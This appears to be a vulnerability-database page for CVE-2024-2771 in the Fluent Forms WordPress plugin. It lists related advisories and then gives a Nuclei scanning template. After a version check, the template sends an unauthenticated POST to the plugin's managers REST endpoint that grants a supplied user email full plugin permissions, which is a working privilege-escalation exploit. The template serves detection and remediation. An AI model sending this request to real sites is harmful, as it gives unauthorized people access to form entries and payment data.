| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for Missing Authorization in Fluentforms Contact_Form | 3 Aug 202506:06 | – | githubexploit | |
| CVE-2024-2771 | 21 May 202415:30 | – | circl | |
| WordPress plugin Fluent Forms 安全漏洞 | 18 May 202400:00 | – | cnnvd | |
| CVE-2024-2771 | 18 May 202407:38 | – | cve | |
| CVE-2024-2771 Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization to Settings Update and Limited Privilege Escalation | 18 May 202407:38 | – | cvelist | |
| EUVD-2024-27715 | 18 May 202407:38 | – | euvd | |
| CVE-2024-2771 | 18 May 202408:15 | – | nvd | |
| CVE-2024-2771 | 18 May 202408:15 | – | osv | |
| WordPress FluentForm Plugin <= 5.1.16 is vulnerable to Privilege Escalation | 20 May 202400:00 | – | patchstack | |
| WordPress FluentForm plugin <= 5.1.16 - Missing Authorization to Settings Update and Limited Privilege Escalation vulnerability | 20 May 202401:12 | – | patchstack |
id: CVE-2024-2771
info:
name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
author: Sourabh-Sahu
severity: critical
description: |
The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
impact: |
Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
remediation: |
Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
reference:
- https://github.com/whale93/CVE-2024-2771-PoC
- https://nvd.nist.gov/vuln/detail/CVE-2024-2771
- https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-2771
cwe-id: CWE-862
epss-score: 0.02333
epss-percentile: 0.81476
cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/fluentform/"
vendor: fluentforms
product: contact_form
framework: wordpress
tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln
flow: http(1) || http(2)
http:
- raw:
- |
GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- compare_versions(version, '< 5.1.17')
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
POST /wp-json/fluentform/v1/managers HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
{
"manager": {
"email": "{{email}}",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
#exploit requires an existing user email address to work.
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'Manager has been saved.','{{email}}')"
- "contains(content_type, 'application/json')"
condition: and
# digest: 490a0046304402202f8e7cab919e9861784e305655831af3afa758e76d6aee0621d33e2cce09f7e3022033ad390c59f3714ffa2e35a6c3bdf23b4541c18ffb51882b1a32a5e0cf4c521d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation